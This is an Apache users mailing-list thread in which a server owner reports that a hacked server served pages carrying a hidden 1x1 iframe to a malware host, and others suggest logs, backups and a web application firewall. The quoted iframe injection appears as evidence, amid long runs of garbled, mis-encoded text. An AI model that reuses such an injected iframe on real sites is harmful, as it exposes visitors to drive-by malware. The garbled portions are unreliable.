If so, just look at its logs :)

Otherwise, I'd look carefully at the dates that things were modified.
you *do* have backups, right?

--
Morgan Gangwere

>> Why?
> Because it breaks the logical flow of conversation, plus makes
messages unreadable.
>>> Top-Posting is evil.

------------------------------------------------------------ ---------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

Re: Someone hacked my apache2 server

am 04.04.2010 04:48:12 von xiazhengxin

Yes,the hacker is from China.

the subfix "9966.org" is provided by the biggest DynDNS ISP of China.

Best regards,
Sharl.Jimh.Tsin

------------------------------------------------------------ ---------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

Re: Someone hacked my apache2 server

am 04.04.2010 04:55:11 von vidals

--0016361e89b053d4340483605739
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: base64

T2xlZywKCldoYXQga2luZCBvZiB3ZWIgYXBwbGljYXRpb24gZmlyZXdhbGwg KFdBRikgYXJlIHlv
dSBydW5uaW5nIG9uIHlvdXIgd2ViCnNlcnZlcnM/IElmIHRoZSBhbnN3ZXIg aXMgIm5vbmUiLCB0
aGVuIHlvdSB3aWxsIGhhdmUgbWFueSBwcm9ibGVtcyB3aXRoCm1hbHdhcmUg YW5kIGhhY2tlcnMu
ICBZb3UgbXVzdCBoYXZlIHByb3BlciBzZWN1cml0eS4gR29vZ2xlICJtb2Rf c2VjdXJpdHkiCm9y
IGhpcmUgYSB3ZWIgc2VjdXJpdHkgZ3V5IHRvIHRha2UgY2FyZSBvZiB5b3Vy IHNlcnZlcnMgZm9y
IHlvdS4KCkdpbCBWaWRhbHMKd3d3LnZtcmFja3MuY29tCgpPbiBTYXQsIEFw ciAzLCAyMDEwIGF0
IDI6MjAgUE0sIE9sZWcgR29yeXVub3YgPG9sZWcuZ29yeXVub3ZAZ21haWwu Y29tPndyb3RlOgoK
PiBIZWxsbyBhbGwsCj4gSXQgbG9va3MgbGlrZSBzb21lb25lIGhhY2tlZCBt eSBhcGFjaGUyIHNl
cnZlciBhbmQgSSBhbSB0cnlpbmcgdG8KPiB1bmRlcnN0YW5kIGhvdyB0aGlz IGNvdWxkIGhhdmUg
aGFwcGVuZWQuCj4gVGhpcyBpcyB3aGF0IGhhcHBlbmVkOgo+IEFsbCBvZiBh IHN1ZGRlbiB0aGUg
c2VydmVyIC0gaW4gcmVzcG9uc2UgdG8gYSB3ZWItYnJvd3NlciByZXF1ZXN0 IGZvciBhCj4gcGFn
ZSAtIHN0YXJ0ZWQgdG8gZ2l2ZSBhIGZ1bGwgc2NyZWVuIG9mIHVua25vd24g Y2hhcmFjdGVycyAo
bG9va2VkIGxpa2UgYQo+IGxvbmcgdGV4dCB3aXRoIGVuY29kaW5nIG1pc21h dGNoKS4KPiBUaGUg
b3V0cHV0IHdhcyBpbW1lZGlhdGUgYW5kIHRoZSBzYW1lIGZvciBhbGwgdGhl IHdlYi1zaXRlcyBs
b2NhdGVkIG9uIHRoZQo+IHNlcnZlci4KPiBMb29raW5nIGF0IHRoZSBwYWdl IHNvdXJjZSBvZiB0
aGUgb3V0cHV0IEkgc2VlIHRoZSBmb2xsb3dpbmc6Cj4gPT09PT09PT09Cj4K PiA8aWZyYW1lIHNy
Yz0gIGh0dHA6Ly9hIHogcyB4IGQgZSA1IDUgLiA5IDkgNiA2IC4gb3JnOjg4 MDAvYWs0Ny8yOS5o
dG1sCj4gd2lkdGg9MSBoZWlnaHQ9MT48L2lmcmFtZT4g0Jsg77+977+977+9 77+977+977+9INGN
W9GBbuKWiDgg4pag4paM77+94oiaIFwt4paReyDilZjQpiAn4paIJnEg4pSk SSDRiV3ilZnRhOKV
pWx74oia0LvQsAo+ICTilIxmQ9ChKknilJjRkdGBINGG0K7RhdCu0YxmKOKV qdCmIDlO4paTLdC+
4pWXcNCQ4pSAIDnihJZmONCsICDQl+KVqdCB4oia0KPRlNGD0LviloAuXtCh 0JlNIOKVo8Kw0ZfR
hdCr4pWr4pWfJNGI0JTRgdCX4pS0cSDQrlzQrdCgINCuCj4gXtCt4pWcIcKk btCfXGkqCj4KPiDi
lZZcSSrilKzQgeKVkuKWiNCQICBr4pSCwqQw0KzilZBm4paM4pSY0LDQu9CH OOKVneKVkSBvINC7
0J/Qk8Kk4pWr0J7QvdCc0YwmNiAgICAgINCe0JbQnuKWgE0q0LQ5bEHRidGP 0Y3RjSDQk9CT0LPQ
veKImuKVmSLilaTilZvQsHJ8Cj4gMOKUmCBHINC5PSAg0LPilZTilaQgIeKU nNCYIEYm0KrQnSDQ
oNCi4pWQ4pWRVFDilZDQndCw0KHRieKVnioKPiBN0K5lSuKWiG4gIOKVkdCR KeKUgtCk0YDQoCDi
iJrQrNGU0YlhICtp0KnilKQgO+KVp1hA4oSW4pWZYWDilJjQnQo+IHHRgCDQ mSdUIGYgczvRijzQ
v9GBSNCq4paT4pScQNC7SFlTIOKVpmXilKxu0K7QotChIELilZBaIFzilILi iJlM0YnQtDrRhNCj
UtC50LBP4pWU4paA4paEZ+KVpiDilabQvdC44pWp0Z7RjuKVq9Cb0JvRlOKV ptC7IErQquKWiNCZ
4pWlCj4g4pWlIEnilaklN+KWkdCaIOKWiG8KPgo+IEjQqNCZNeKVp3B9K9Cz Cj4gSeKVmycgYifQ
nCRz0LDRhTFBfVJB0Kggc+KVlCDQpUk50JDQtFTilaUxS9GR0LvQqSDilabi laUgTmMm0KnQp9GC
INCvfncgeNCtZ0zQoncq4pWrMSPilZ8g4oiZbNCRXEI6ZSB5ICDilJzRgjsK PiDQp+KVq+KWkCxC
ICEg4pWYMiAu4pWQIiDilaQpIOKVk13CsCAg4pWQ4pSAYWBAWTbilawt4pS0 0I7QkNCwIOKUlAo+
INC24pSUMeKVndGJIG0g4pWZQknQruKUlNCp4pWfJzrQtUVrQNCc0J7QkWfi lakgTuKUnGLilqDR
gScg0LZKWdC10JTRiX4y0YA0YUHihJZo4pSk0KjilZFFatCQbSDilIIuJmPR h9CS0KkgICAgICBj
0JBx0KdiU3kKPiDRjOKUrFNQ0KXilIA94pSc0LQgICAgICAgIFLilJwg0L9E 4paMINCW0JUgbwo+
Cj4gI9Cl4pWg0JHilZDilZTRi9GeJCDilZhAfEgp0KdB4pWcKTdM0K8x0KnQ szlAL+KVmeKVqCBk
OFI6JTRGfdCQLEw20Kwg0Jxu0LLQouKUnCBTICQu0LxPKDDilIzQkHBo4pWe 4pWkICBc0ITilaRs
4oSWCj4gNCPCt9CjJ0MuM+KUpCAgICAgINCwTVUi4pWe0IQj0JrQkTjilZI5 0KXilZrilaY+0J/R
hUZH0YomIFTilapq4pSQ0YEgIMK3fiBGWuKImWTvv70wS0ou0Y4gICAgICBi ReKVlNC50YzilZzi
lLxnCj4g0Yw4LuKVn9C90YLQs+KUtNCz4pWlIOKUpNGJOU140KIwWdCEWdCO 4paQ0YI00LUiINCa
OTPQruKVq9C10LclZ9C8ZNCXIGlpKOKWkTgg0J0zJeKUtNCTQ1RFINC60JZ4 4pSAdOKVq28gSCDR
ieKWiNCWIS0g0KReCj4gQeKUmCPQkOKVlSB0STlr0JfilpJVTuKVkW1+4pWp 0Jc7PyDQkHYgXOKV
miDilZ84S+KVkNGXYtCkN9CwNUM04pSC4pWjXuKWk3ozeOKWiNCfT19OY+KI mdCf0KzQrl7ilIzR
iGTilafihJbQjmFXXnx40K/Qv+KUvNCS0Y8KPiBJMmDilZzilZzilLRub3fR nuKUmCjilIzilJji
lpDRidGPJOKVlF4g0Y0g4pWi4oia4pWU0JJLINCx0JYh4pSM4pWj0ZQ40IHQ t+KVkVdZ0KXQsVMg
IOKUvNCB4paI0Y8g4paAcNC1cdC3INCEdNGM0JNQ0LvQq9GUMNGK0J7iiJlo YQo+IDoiViDRgdCz
4pWeaSDilZZaQCBZ0Z7ilqDQlVks0KBgLSBGRTTQrmEuINGRINCWdjDQuCAg 0IcgXtCOZFTRg9GG
4pSsQeKVrD504pWo4pWh4pSYICDQqdCc4pWp0LPilZnRlOKUglcgfdGRK+KW kyBmVVgKPiDQl9Ge
cyAgLXfQslIgRuKWkeKImdCd4pWVNeKWkGQg4paR0KfilZvilpIKPgo+Cj4g fiDRkVkg0LLQoiDQ
sFkgdGxr0LDRh9C+0K1g4oiaLeKWhCDilLxt0YHQgeKVoCAu4paIICAg4pWj 0L3ilIzQk+KWoHsg
0YU/0YogIHXRjjRk4pWQ4pSkStCE4pWVLtGC4pWS0YkrcnF5ftCE0YvRkeKV kuKWjOKVkeKWhG0K
PiDilaPQrCogMzVleuKVqWHilpLQutGA0L/RhXvRjCNl0Yc60YU+X+KUtNCT 0Yp4ICAxwrAv0Lsx
eFHRieKVlSDilZ3QstCj0LZF0KQsIi5g0L3ilZ7Qs1zilZHQvdC8YSBFJ1nQ h9C+0KvilZrilpAK
PiAuWtGFINCQOtGNbC7Qm+KWkHvilILilJjRjtC9YNGDUtCtIOKUgNCsIMKw S+KVqXTilaDQudGI
JGhIIOKUguKVluKVkSAgLdC04pWa0KosaeKVlNCidtCtIMKk4pWhIkgg0L/R h8Kk0I7ihJbCsCBM
4pWWVzDQnXNj4pS0IHUKPiBSJdGKNOKVqllm4pScNeKVrOKVn9Cu0KIsKCt5 0ZQ60I7QkyDRjCXi
lILilpHRiV13UiUx0ZHilKzQlS5y4pWeINGL4pWWICBZUuKImTx9IOKWiCDR jiDQnuKVldC04pWl
LXEg4pWWX+KVqeKVrHsyWdGF0YbilZXilZQKPiDilLTilKTRidGA0JFBK1Hi lZbiloTilpPQp8Kw
4paQe9CX4pWX0YfQnwo+Cj4gd9CoQeKUvOKVo+KVk9GONFLRnnPilaBG0Lfi laDilaN74pWZIGvi
lZTQudGH4paROOKVm+KWhCDilqDilaLQq9CR4pScI9CV0L3QkdGP4oSWfiBv 4pWX4pWj0KvQpNCw
ICYyOAo+IF7ilatAT33RgzrilahmIC1B0L/QtdCqICAgICAg0KbQnCDQruKU mGvilZog0L/QjuKW
hHvRicK34pWcL+KVllXRl9CrcSRh0LnQuuKVlHjQhNGK0Yx84pWQIDUgIDHi loQg0Jgg0K/RlNGG
0YZ8ICDilIB34paEb9GPNAo+INGD0L1j77+94pWfP+KVnmRMTSPQs3jilZZs 4pSQ4pSQSuKVluKU
kNCwStCrYQo+IOKVmXYq0YfRlzh4fnbRkdGC0Y1vdyt24pWoXCDQnyDilaVk SiEgIOKUgsK34pWg
XyzQquKVq9Co0YrQsCDilZpL0YDQpCDQkyDRjCrRilnilaTilaIgcuKUvNC8 MdChNNCdODzilZdr
YdCB4paIQ9CE0ZfQp9Cf4pWQ4pWr0LMKPiBH0YbRi+KVpOKWjOKImcK3Ik8g 0KfilaQg4pSC0Zcg
Ul/iiJpZ0KAuJiB8ICDQn9C2dFjQnkjCsOKUpOKVpMKk0JbQndCQROKWhOKU mNCZINGO4pWVciDC
pAo+Cj4gS1Yk0KcgICAgICDilZnQqNC7V9CdJzh64paS0KDilogg0JZr4pWb WUV44pSc0YV1cERC
UtCz0Jg00LNJ0LzRlDQycCTilaLQoyDQrdCTINGXwqRm4pWmID4g0JYgPz4g INGLJ2NpINCy4pWr
ae+/vQo+INCZ0LnQnGHRiSB+0JZWINCiTdCBMOKVqeKVn+KVpeKUmCAqKtGU QeKVniDQo+KWkSAj
bWdEUy7RhuKImiB20L4gMtCx0LdYItCs4pWl0JPQsE4gK9Cx0Ic+4oiZ0LHR h34g0Jg70Z5MICBP
0Yw+0KFwCj4g4pWa0LXRgtCQODzQvNCT0YzQo+KWoCDilZcg0JzRj27RkXw8 4pWo0LRf0KPiloh3
P+KVp9GMOlkg4oiZbC3QmyDQuFNG4pWh0KggZmEsVlfRjdCUWlfQkMKk0KzQ ky7RjdCswrBd0KUg
4paE0YnRgdCc4pScCj4KPiDQsdC44pWdOdGB0Lkr4pWsQiAgQSYg4pWULdCn btC0VVjilpJ1dSDQ
skYg0JIgKU9k0YQKPiDRgSBiNtCpINCla0J50JrQn1Yh4pWU0KQn4pWgIUTi lpFV0KFMQSDilIDQ
pS8l0JDRl9GHKGTilaDilZHQm3g20Yk70K3Qp9C6SNC5IHPilaNPem7QluKU nEjQo9CB0Ygg4pWq
4pSkTCBT0JDQlCgKPiDQvNC8JuKVl1ozTnZK4pWjcCDRiGjilZZ34pSsXSDi laYKPgo+ICDQoeKW
jOKUtOKEluKUkCBp0Y/Rj9CQbSA04pSAN9GIYtC1enHilZFo0JrQpNCV4pSk 4pWcTibilJQtCj4g
ICpYO1TRg9Cc0KFE0Y17LuKVo1jilZ/QttCaWeKVk9GAIG5iZ2zilabilZBF 4pSCJFMg0KPilZDQ
l9GAIHEgICAgICBLI9CaM0bQsTrilZrCtzEgINCXINGRcdC+XdCf4paIctCQ IG464paA0JDilagK
PiDQq+KVlNCVO9CbeuKVpjDilZXilak10KHilaTQlOKVpFLilZwgICAgICDQ q3IKPgo+IOKUkNCv
eXk04pSCIOKUrD7ilZrQgdCdKeKVn3vQldCpKNGFNOKVmOKVqCAgINGFIOKW oCDQoyB80IdZOMKw
eeKVlnrQh+KUgEAkRCBz4oSW4paS0Lli4paS0LYx0JPQv9GB4pSC4pWm0JBQ cV/iiJnQo9C9OHEg
4pWSaiDilZLilaJCCj4g4pWRICDilaHRjDwg4pWq0Y0q0KvQk9CRZSDQlWtU fOKUlNGNIC3Qju+/
veKUtFog4pWd4pWr4pWg4paEPSA04pWQUeKUnOKVm0DQgeKVmCDilJTQriLQ m9Cd4pS8THjQpkHi
larQteKVntC9INGG0LzQklkg0ZFK0YTilaLQqtCH4pWTCj4g4paS4pWl0YHi lZvCsNC80YnQhNGG
4pWl4pWXPm5HfkNIKGQi4pWS0JNj0JvQoNC1wqTihJZhICDilpPilpAgIDY5 4pWWICAg0JBvWDt3
0YYg0Yts0Y3ilaFzICAgWdCYTNCoQCAgIOKVlyDiiJpDIFrRjCDRgAo+ICLC sNCE0JFQY9CnYSln
0KNl0YXQtDROSOKUkCAgL+KVkCFj0KHQlNC10KDilKQg0LnilZTQs9CkQ9GK IC45K9GU0KvilJDi
laogICAgICDRhDVYINGAIDY80YfilpLilLzvv73QqiTilajRguKVpeKWktCY 0KHQhOKVpeKElnUK
PiDilZ5h0Jx00ITQpV7QgVc/S9Ge4pWWMiDQudC80KPRgOKVkzTQoCBFCj4K PiA9PT09PT09PT09
PT09PT09PT0KPiBUaGUgYWRkcmVzcyBpbmRpY2F0ZWQgaW4gdGhlIGJlZ2lu aW5nIG9mIHRoZSBw
YWdlIGNvZGUgbGVhZHMgdG8gc29tZQo+IGNoaW5lc2Ugc2VydmVyLgo+Cj4K PiBTbywgc29tZWhv
dyBpdCBoYXBwZW5lZCB0aGF0IHRoZSBvdXRwdXQgb2YgdGhlIGFwYWNoZSBz ZXJ2ZXIgd2FzCj4g
c3Vic3RpdHV0ZWQgYnkgdGhpcyBwYWdlLCB3aGljaCByZWRpcmVjdGVkIHZp c2l0b3JzIHRvIHNv
bWUgY2hpbmVzZSBzZXJ2ZXIuIEl0Cj4gaXMgdGhlIHNlY29uZCB0aW1lIEkg YW0gcG9zdGluZyB0
byB0aGUgbWFpbGluZyBsaXN0LCB0aGUgZmlyc3QgdGltZSB0aGUKPiBtYWls aW5nIGxpc3Qgdmly
dXMgc2Nhbm5lciBpZGVudGlmaWVkIHRoZSBjb250ZW50IGFzIGhhdmluZyB0 aGUKPiBUcm9qL0Z1
amlmLUdlbiB2aXJ1cywgdGh1cywgdGhpcyB0aW1lIEkgcmVtb3ZlZCBhY3Rp dmUgbGlua3MgZnJv
bSB0aGUKPiBtZXNzYWdlIGJvZHkgc28gaXQgaXMgbm90IGV4YWN0bHkgd2hh dCBJIHJlY2VpdmVk
KS4KPgo+Cj4gQnV0IHRoZSBtb3N0IHN0cmFuZ2UgdGhpbmcgd2FzIHRoYXQg dGhlIHByb2JsZW0g
ZGlzc2FwZWFyZWQgaXRzZWxmISBTbywgaXQKPiBsYXN0IGZvciAxMCBtaW51 dGVzIHRoZW4gZGlz
YXBwZWFyZWQhIEFuZCB0aGUgYWdhaW4gc3RhcnRlZCBhbmQgYWdhaW4KPiBk aXNzYXBlYXJlZC4g
RmluYWxseSwgSSB0dXJuZWQgZG93biBhcGFjaGUgdW50aWxsIEkgdW5kZXJz dGFuZCB3aGF0IGlz
IGdvaW5nCj4gb24uLi4KPgo+IEFueSBpZGVhIGhvdyBjb3VsZCB0aGF0IGhh cHBlbj8gIEhvdyB0
byByZXByb2R1Y2UgdGhpcz8gSG93IHRvIHByZXZlbnQ/Cj4gV2hlcmUgdG8g bG9vayBmb3IgbG9n
cz8gSSBoYXZlIGNoZWNrIGJvdGggc3NoIGxvZ3MgYW5kIGFwYWNoZSBsb2dz LCB0aGVyZQo+IGlz
IG5vdGhpbmcgdGhhdCBjb3VsZCBzZWVtIHVudXN1YWwgdGhlcmUuLi4KPgo+ IEFueSBoZWxwIGlz
IGFwcHJlY2lhdGVkLgo+IE9sZWcuCj4KPgo=
--0016361e89b053d4340483605739
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

Oleg,

What kind of web application firewall (WAF) are yo=
u running on your web servers? If the answer is "none", then you =
will have many problems with malware and hackers. Â You must have prope=
r security. Google "mod_security" or hire a web security guy to t=
ake care of your servers for you.

Gil Vidals

>www.vmracks.com

On Sat, Apr 3, 2010 =
at 2:20 PM, Oleg Goryunov < unov@gmail.com">oleg.goryunov@gmail.com> wrote:

x #ccc solid;padding-left:1ex;">

Hel=
lo all,

It looks like someone hacked my apache2 server and I am trying to understan=
d
how this could have happened.

This is what happened:

All of a sudden the server - in response to a web-browser request for a pag=
e -
started to give a full screen of unknown characters (looked like a long tex=
t
with encoding mismatch).

The output was immediate and the same for all the web-sites located on the
server.

Looking at the page source of the output I see the following:

=========3D

ier"><iframe
src=3DÂ http://a a>
z s x d e 5 5 . 9 9 6 6 . org:8800/ak47/29.html width=3D1
height=3D1></iframe> ily:"Times New Roman"">Ð ;font-family:Courier"> ot;Menlo Regular"">ï¿½ï¿½ï¿½ï¿½ï¿½ï=BF=
=BD style=3D"font-size:10pt;font-family:"Times New Roman"">Ñ an>[ =3D"font-size:10pt;font-family:"Times New Roman"">Ñ pan style=3D"font-size:10pt;font-family:Courier">n t-size:10pt;font-family:"Times New Roman"">â=88 style=3D"font-size:10pt;font-family:Courier">8 ize:10pt;font-family:"Times New Roman"">â â=
ï¿=
=BDâ=9A \- span> >â=91{ n>=
âÐ=A6 &=
#39; quot;">â=88&=
amp;q n"">â=A4 >I uot;">Ñ] an>=
âÑâ¥ urier">l{â=9A mes New Roman"">Ð»Ð° family:Courier">$ es New Roman"">â=8C ly:Courier">fC New Roman"">Ð¡ rier">*I man"">âÑÑ=81 amily:Courier"> s New Roman"">ÑÐ®ÑÐ®Ñ -size:10pt;font-family:Courier">f( -family:"Times New Roman"">â©Ð=A6 ont-size:10pt;font-family:Courier"> 9N font-family:"Times New Roman"">â=93 t-size:10pt;font-family:Courier">- -family:"Times New Roman"">Ð¾â=97 ont-size:10pt;font-family:Courier">p nt-family:"Times New Roman"">Ðâ=80 "font-size:10pt;font-family:Courier"> 9â=96f8 t-size:10pt;font-family:"Times New Roman"">Ð¬ le=3D"font-size:10pt;font-family:Courier">Â style=3D"font-size:10pt;font-family:"Times New Roman"">Ð=E2=
©Ð=E2=
n"">Ð£ÑÑÐ»â=80 0pt;font-family:Courier">.^ :"Times New Roman"">Ð¡Ð 0pt;font-family:Courier">M :"Times New Roman"">â=A3 ;font-family:Courier">Â° y:"Times New Roman"">ÑÑÐ«â«â<=
span style=3D"font-size:10pt;font-family:Courier">$ nt-size:10pt;font-family:"Times New Roman"">ÑÐÑ=D0=
â´q pan>=
Ð®\ an style=3D"font-size:10pt;font-family:"Times New Roman"">Ð=
Ð an style=3D"font-size:10pt;font-family:"Times New Roman"">Ð®<=
/span>^ e=3D"font-size:10pt;font-family:"Times New Roman"">Ðâ=
=9C!Â¤n >=D0=
=9F\i*

Â

t;Times New Roman"">â=96 -family:Courier">\I* Times New Roman"">â¬ÐââÐ=90 style=3D"font-size:10pt;font-family:Courier">Â k pan style=3D"font-size:10pt;font-family:"Times New Roman"">â=
=82Â¤0=
=D0=
¬âf an>=
ââÐ°Ð»Ð nt-family:Courier">8 Times New Roman"">ââ pt;font-family:Courier"> o :"Times New Roman"">Ð»ÐÐ size:10pt;font-family:Courier">Â¤ ont-family:"Times New Roman"">â«ÐÐ½ÐÑ=8C span>&6Â =
Â Â Â Â amily:"Times New Roman"">ÐÐÐâ=80 style=3D"font-size:10pt;font-family:Courier">M* ize:10pt;font-family:"Times New Roman"">Ð´ =3D"font-size:10pt;font-family:Courier">9lA 10pt;font-family:"Times New Roman"">ÑÑÑÑ n> "font-size:10pt;font-family:"Times New Roman"">ÐÐÐ³=
Ð½â=9A span> >â=99"<=
/span> ">â¤âÐ° Courier">r| 0 ew Roman"">â=98 ourier"> G Roman"">Ð¹ r">=3DÂ "Times New Roman"">Ð³ââ¤ font-size:10pt;font-family:Courier"> ! font-family:"Times New Roman"">âÐ=98 =3D"font-size:10pt;font-family:Courier"> F& ize:10pt;font-family:"Times New Roman"">ÐªÐ style=3D"font-size:10pt;font-family:Courier"> ze:10pt;font-family:"Times New Roman"">Ð Ð¢ââ=
TP pan style=3D"font-size:10pt;font-family:"Times New Roman"">â=
ÐÐ°Ð¡Ñâ nt-family:Courier">*

M t;">Ð®eJ n>=
â=88n=
Â New Roman"">âÐ=91 amily:Courier">) s New Roman"">âÐ¤ÑÐ=A0 ze:10pt;font-family:Courier"> â=9A ;font-family:"Times New Roman"">Ð¬ÑÑ yle=3D"font-size:10pt;font-family:Courier">a +i ize:10pt;font-family:"Times New Roman"">Ð©â=A4 an style=3D"font-size:10pt;font-family:Courier"> ; t-size:10pt;font-family:"Times New Roman"">â=A7 style=3D"font-size:10pt;font-family:Courier">X@â=96 =3D"font-size:10pt;font-family:"Times New Roman"">â=99 >a` "font-size:10pt;font-family:"Times New Roman"">âÐ=9D pan>

q t;">Ñ >=D0=
=99'T f
s; ot;">Ñ< span> >Ð¿ÑH pan>=
Ðªââ urier">@ man"">Ð»=
HYS quot;">â=A6e=
;">ân an>=
Ð®Ð¢Ð¡ > B uot;">â=90Z =
\ t;">â=82=E2=
L an"">ÑÐ´ ier">: n"">ÑÐ£ er">R "">Ð¹Ð° r">O quot;">âââ=84 -family:Courier">g mes New Roman"">â=A6 ily:Courier"> New Roman" ">â¦Ð½Ð¸â©ÑÑâ«Ð=9B=
ÐÑâ¦Ð=BB :Courier"> J w Roman"">ÐªâÐâ¥ e:10pt;font-family:Courier"> ly:"Times New Roman"">â=A5 pt;font-family:Courier"> I "Times New Roman"">â=A9 font-family:Courier">%7 ot;Times New Roman"">âÐ=9A pt;font-family:Courier"> quot;Times New Roman"">â=88 ont-family:Courier">o

Â

H t;">Ð¨Ð5=
;">â=A7p}+ span> >Ð³

I t;">â=9B'=
; b' man"">Ð=
$s ot;">Ð°Ñ=
1A}RA "">Ð¨ s<=
/span> ">â=94 n>=
Ð¥I9 pan style=3D"font-size:10pt;font-family:"Times New Roman"">Ð=
Ð´T an style=3D"font-size:10pt;font-family:"Times New Roman"">â=
=A51K style=3D"font-size:10pt;font-family:"Times New Roman"">Ñ=D0=
»Ð=A9 =
=E2=
¦â=A5
Nc& an"">Ð©Ð§Ñ y:Courier"> w Roman"">Ð¯ er">~w x man"">Ð=
gL ot;">Ð¢w* an>=
â=AB1# >=E2=
â=99l=
;">Ð\B:e
yÂ ;Times New Roman"">âÑ=82 ;font-family:Courier"> ; quot;Times New Roman"">Ð§â«â ont-size:10pt;font-family:Courier">,B ! t;font-family:"Times New Roman"">â=98 ont-size:10pt;font-family:Courier">2 . font-family:"Times New Roman"">â=90 t-size:10pt;font-family:Courier">" t;font-family:"Times New Roman"">â=A4 ont-size:10pt;font-family:Courier">) ont-family:"Times New Roman"">â=93 -size:10pt;font-family:Courier">]Â°Â le=3D"font-size:10pt;font-family:"Times New Roman"">ââ=
a`@Y6 >=E2=
¬- an style=3D"font-size:10pt;font-family:"Times New Roman"">â=
´ÐÐÐ° er"> "">â=94=

;">Ð¶â=94 >1 ot;">âÑ=89 r"> m n"">â=99 >BI uot;">Ð®âÐ©â nt-family:Courier">': quot;Times New Roman"">Ðµ -family:Courier">Ek@ Times New Roman"">ÐÐÐ pt;font-family:Courier">g quot;Times New Roman"">â=A9 ont-family:Courier"> N t;Times New Roman"">â=9C -family:Courier">b mes New Roman"">â Ñ=81 nt-family:Courier">' quot;Times New Roman"">Ð¶ -family:Courier">JY imes New Roman"">ÐµÐÑ t;font-family:Courier">~2 quot;Times New Roman"">Ñ -family:Courier">4aAâ=96h ily:"Times New Roman"">â¤Ð¨â =3D"font-size:10pt;font-family:Courier">Ej 0pt;font-family:"Times New Roman"">Ð nt-size:10pt;font-family:Courier">m nt-family:"Times New Roman"">â=82 size:10pt;font-family:Courier">.&c font-family:"Times New Roman"">ÑÐÐ© le=3D"font-size:10pt;font-family:Courier">Â Â Â Â =C2=
=A0 c w Roman"">Ð er">q "">Ð§ bS=
y t;">Ñâ ">SP quot;">Ð¥â=80 ier">=3D man"">âÐ=B4 Courier"> Â Â Â Â Â Â R<=
/span> ">â=9C n>=
Ð¿D an style=3D"font-size:10pt;font-family:"Times New Roman"">â=
=8C style=3D"font-size:10pt;font-family:"Times New Roman"">Ð=D0=
=95 o

Â

# t;">Ð¥â ÐââÑÑ=9E =3D"font-size:10pt;font-family:Courier">$ 0pt;font-family:"Times New Roman"">â=98 "font-size:10pt;font-family:Courier">@|H) pt;font-family:"Times New Roman"">Ð§ t-size:10pt;font-family:Courier">A -family:"Times New Roman"">â=9C ze:10pt;font-family:Courier">)7L amily:"Times New Roman"">Ð¯ pt;font-family:Courier">1 quot;Times New Roman"">Ð©Ð³ t;font-family:Courier">9@/ "Times New Roman"">ââ¨ ize:10pt;font-family:Courier">Â d8R:%4F} :10pt;font-family:"Times New Roman"">Ð font-size:10pt;font-family:Courier">,L6 ;font-family:"Times New Roman"">Ð¬ size:10pt;font-family:Courier"> amily:"Times New Roman"">Ð pt;font-family:Courier">n quot;Times New Roman"">Ð²Ð¢â=9C -size:10pt;font-family:Courier"> S $. ont-family:"Times New Roman"">Ð¼ ze:10pt;font-family:Courier">O(0 amily:"Times New Roman"">âÐ=90 t-size:10pt;font-family:Courier">ph t-family:"Times New Roman"">ââ¤ =3D"font-size:10pt;font-family:Courier">
Â \ an"">Ðâ=A4 ourier">lâ=96 4#Â· :"Times New Roman"">Ð£ nt-family:Courier">'C.3 :"Times New Roman"">â=A4 ;font-family:Courier">Â Â Â Â Â pan style=3D"font-size:10pt;font-family:"Times New Roman"">Ð°=
MU" pan style=3D"font-size:10pt;font-family:"Times New Roman"">â=
Ð=84#=
=D0=
Ð=918=
=E2=
9 an style=3D"font-size:10pt;font-family:"Times New Roman"">Ð¥=
ââ¦ >> "">ÐÑ r">FG "">Ñ&am=
p; T quot;">â=AAj=
;">âÑ=81 >Â Â·~ FZâ=99d y:"Menlo Regular"">ï¿=BD font-family:Courier">0KJ. quot;Times New Roman"">Ñ -family:Courier">Â Â Â Â Â bE style=3D"font-size:10pt;font-family:"Times New Roman"">â=94=
Ð¹Ñââ¼ ily:Courier">gÂ Â Â Â Â e=3D"font-size:10pt;font-family:"Times New Roman"">Ñ<=
span style=3D"font-size:10pt;font-family:Courier">8. ont-size:10pt;font-family:"Times New Roman"">âÐ½Ñ=
Ð³â´Ð³â=A5 family:Courier"> es New Roman"">â¤Ñ=89 t-family:Courier">9Mx ;Times New Roman"">Ð¢ ily:Courier">0Y New Roman"">Ð urier">Y man"">ÐâÑ=82 amily:Courier">4 s New Roman"">Ðµ ourier">" New Roman"">Ð urier">93 oman"">Ð®â«ÐµÐ=B7 ;font-family:Courier">%g uot;Times New Roman"">Ð¼ family:Courier">d es New Roman"">Ð Courier"> ii( ew Roman"">â=91 ourier">8 Roman"">Ð ">3% quot;">â´Ð=93 ier">CTE oman"">ÐºÐ urier">x man"">â=80 r">t quot;">â=ABo=
H uot;">ÑâÐ=96 :Courier">!- ew Roman"">Ð¤ ier">^Â A :"Times New Roman"">â=98 ;font-family:Courier"># ot;Times New Roman"">Ðâ=95 pt;font-family:Courier"> tI9k ly:"Times New Roman"">Ðâ=92 ize:10pt;font-family:Courier">UN amily:"Times New Roman"">â=91 :10pt;font-family:Courier">m~ ly:"Times New Roman"">â©Ð=97 ize:10pt;font-family:Courier">;? family:"Times New Roman"">Ð 0pt;font-family:Courier">v \ y:"Times New Roman"">â=9A t;font-family:Courier"> uot;Times New Roman"">â=9F nt-family:Courier">8K ;Times New Roman"">âÑ=97 ;font-family:Courier">b ot;Times New Roman"">Ð¤ amily:Courier">7 s New Roman"">Ð° ourier">5C4 Roman"">ââ£ amily:Courier">^ s New Roman"">â=93 y:Courier">z3x New Roman"">âÐ=9F amily:Courier">O_Ncâ=99 y:"Times New Roman"">ÐÐ¬Ð® -size:10pt;font-family:Courier">^ family:"Times New Roman"">âÑ=88 nt-size:10pt;font-family:Courier">d t-family:"Times New Roman"">â=A7 ize:10pt;font-family:Courier">â=96 ;font-family:"Times New Roman"">Ð size:10pt;font-family:Courier">aW^|x nt-family:"Times New Roman"">Ð¯Ð¿â¼ÐÑ=8F pan>I2` e=3D"font-size:10pt;font-family:"Times New Roman"">ââ=
â=B4no=
